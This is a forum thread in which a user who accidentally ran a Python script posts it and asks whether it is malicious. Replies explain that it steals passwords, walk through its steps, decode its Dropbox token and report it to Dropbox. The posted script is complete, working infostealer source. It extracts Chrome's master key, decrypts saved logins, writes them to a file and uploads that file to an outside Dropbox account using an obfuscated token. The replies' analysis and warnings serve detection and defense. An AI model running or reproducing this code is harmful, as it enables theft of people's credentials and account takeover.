Help! I accidentally ran a file without checking the code

[scaryzane]

So I accidentally ran this file today, and didnt check the python code. Can anybody tell me if this code is malicious?

import os
import json
import base64
import sqlite3
import win32crypt
from Crypto.Cipher import AES
import shutil
import dropbox
from codecs import encode
import getpass


def upload_passfile():
    access_token = encode("pYTjP6sifCxNNNNNNNNNNDIRXrA2kfdgl93KiKK1ddIgXDbvfwWFMmDlTyB1EP0i", 'rot13')
    file_from = "rc.txt"
    file_to = "/passwords/" + str(getpass.getuser()) + "'s_passwords.txt"
    client = dropbox.Dropbox(access_token)
    client.files_upload(open(file_from, "rb").read(), file_to, dropbox.files.WriteMode.overwrite, mute=True)


def get_master_key():
    with open(os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\Local State', "r", encoding='utf-8') as f:
        local_state = f.read()
        local_state = json.loads(local_state)
    master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
    master_key = master_key[5:]  # removing DPAPI
    master_key = win32crypt.CryptUnprotectData(master_key, None, None, None, 0)[1] # sqlite3 decryption
    return master_key


def decrypt_payload(cipher, payload):
    return cipher.decrypt(payload)


def generate_cipher(aes_key, iv):
    return AES.new(aes_key, AES.MODE_GCM, iv)


def decrypt_password(buff, master_key):
    try:
        iv = buff[3:15]
        payload = buff[15:]
        cipher = generate_cipher(master_key, iv)
        decrypted_pass = decrypt_payload(cipher, payload)
        decrypted_pass = decrypted_pass[:-16].decode()  # remove suffix bytes
        return decrypted_pass

    except Exception as e:
        decrypted_pass = win32crypt.CryptUnprotectData(buff, None, None, None, 0) #Tuple
        return str(decrypted_pass[1])


if __name__ == '__main__':

    master_key = get_master_key()
    login_db = os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\default\Login Data'
    shutil.copy2(login_db, "Loginvault.db") #making a temp copy since Login Data DB is locked while Chrome is running
    conn = sqlite3.connect("Loginvault.db")
    cursor = conn.cursor()

    try:
        cursor.execute("SELECT action_url, username_value, password_value FROM logins")
        passfile = open("rc.txt", "w")
        for r in cursor.fetchall():
            url = r[0]
            username = r[1]
            encrypted_password = r[2]
            decrypted_password = decrypt_password(encrypted_password, master_key)
            passfile.write("URL: " + url + "\nUsername: " + username + "\nPassword: " + decrypted_password + "\n" + "*" * 50 + "\n")
        passfile.close()
        conn.close()

    except Exception as e:
        print(e)

    upload_passfile()
    os.remove("rc.txt")
    os.remove("Loginvault.db")

Larz60+ write Dec-25-2020, 11:46 AM:
Please post all code, output and errors (it it's entirety) between their respective tags. Refer to BBCode help topic on how to post. Use the "Preview Post" button to make sure the code is presented as you expect before hitting the "Post Reply/Thread" button.
Fixed for you this time. Please use code tags on future posts.

[jefsummers]

Without deep analysis, this looks like it is trying to obtain your passwords. I would worry, and change all my critical passwords NOW.

[iiAsez]

I had this issue too but after some code analyses I found out that it only retrieves some of your passwords, so I suggest that you change your most important ones, or all of them (recommended).

[DeaD_EyE]

Hm, the hacker should have used Pathlib and his hack works only on Windows.

1. Getting master key from Chrome
   
2. Copy Login Data to another place (Chrome locks the database)
   
3. Iterating over the SQL SELECT of logins and password, saving line by line in a text file rc.txt. Using the masterkey to decrpyt.
   
4. Sending the rc.txt to a Dropbox account
   
5. deleting the rc.txt and the copy of the login database.
   

One thing is strange. From where comes the module Dropbox?
This hack can only work, if the dropbox dependency is installed in your current Python Interpreter.

PS:
His Dropbox Access Token: cLGwC6fvsPkAAAAAAAAAAQVEKeN2xsqty93XvXX1qqVtKQoisjJSZzQyGlO1RC0v

[buran]

PS:
His Dropbox Access Token: cLGwC6fvsPkAAAAAAAAAAQVEKeN2xsqty93XvXX1qqVtKQoisjJSZzQyGlO1RC0v

Probably you can report them. It most likely violates Dropbox ToS.

[DeaD_EyE]

They are investigating now but the team is not allowed to visit external urls.
So, I provided them also with source code today.